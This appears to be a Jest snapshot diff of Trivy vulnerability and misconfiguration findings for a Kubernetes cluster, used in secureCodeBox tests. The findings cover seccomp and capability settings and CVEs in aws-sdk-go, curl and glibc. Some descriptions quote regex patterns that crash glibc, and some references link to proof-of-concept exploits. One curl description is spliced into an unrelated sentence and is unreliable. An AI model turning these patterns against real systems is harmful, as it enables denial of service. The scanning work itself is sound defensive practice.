+ "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0333", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://hackerone.com/reports/1704017", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8911", + "installedVersion": "v1.40.54", + "packageName": "github.com/aws/aws-sdk-go", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-8911", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8911", + ], + }, + "category": "Vulnerability", + "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": undefined, + "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "value": "https://avd.aquasec.com/nvd/cve-2020-8911", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "value": "https://access.redhat.com/security/cve/CVE-2020-8911", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202212-01", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", + "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213604", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213605", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-1", + "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-2", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5823-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5330", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-23914", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "libcurl4", + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8912", + "installedVersion": "v1.40.54", + "packageName": "github.com/aws/aws-sdk-go", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-23914", - "https://curl.se/docs/CVE-2023-23914.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", - "https://hackerone.com/reports/1813864", - "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", - "https://security.netapp.com/advisory/ntap-20230309-0006/", - "https://ubuntu.com/security/notices/USN-5891-1", - "https://www.cve.org/CVERecord?id=CVE-2023-23914", + "https://access.redhat.com/security/cve/CVE-2020-8912", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8912", ], }, "category": "Vulnerability", - "description": "A cleartext transmission of sensitive information vulnerability exists in curl 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv022", + ], + }, + "category": "Misconfiguration", + "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", + "name": "Non-default capabilities added(Container 'coredns' of Deployment 'coredns' should not set 'securityContext.capabilities.add')", + "references": [ { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "value": "https://avd.aquasec.com/misconfig/ksv022", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", + ], + }, + "category": "Vulnerability", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "references": [ { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "http://osvdb.org/74829", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "http://secunia.com/advisories/45791", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", + ], + }, + "category": "Vulnerability", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "http://secunia.com/advisories/47998", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "http://secunia.com/advisories/48256", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "http://secunia.com/advisories/48692", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "http://secunia.com/advisories/48915", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "http://secunia.com/advisories/48948", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/49198", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "http://secunia.com/advisories/55322", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "http://secunia.com/advisories/55350", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "http://secunia.com/advisories/55351", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: stack guard protection bypass", + "references": [ { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT4999", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5001", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5130", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5281", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5501", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT6150", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "references": [ { "type": "URL", - "value": "http://technet.microsoft.com/security/advisory/2588513", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "http://vnhacker.blogspot.com/2011/09/beast.html", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "http://www.debian.org/security/2012/dsa-2398", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "http://www.insecure.cl/Beast-SSL.rar", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "http://www.kb.cert.org/vuls/id/864643", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: ASLR bypass using cache of thread stack and heap", + "references": [ { "type": "URL", - "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1151/", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1160/", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1151/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1160/", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1151/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1160/", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "http://www.opera.com/support/kb/view/1004/", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49388", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49778", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1029190", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1025997", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026103", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026704", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "http://www.ubuntu.com/usn/USN-1263-1", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-3389", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": 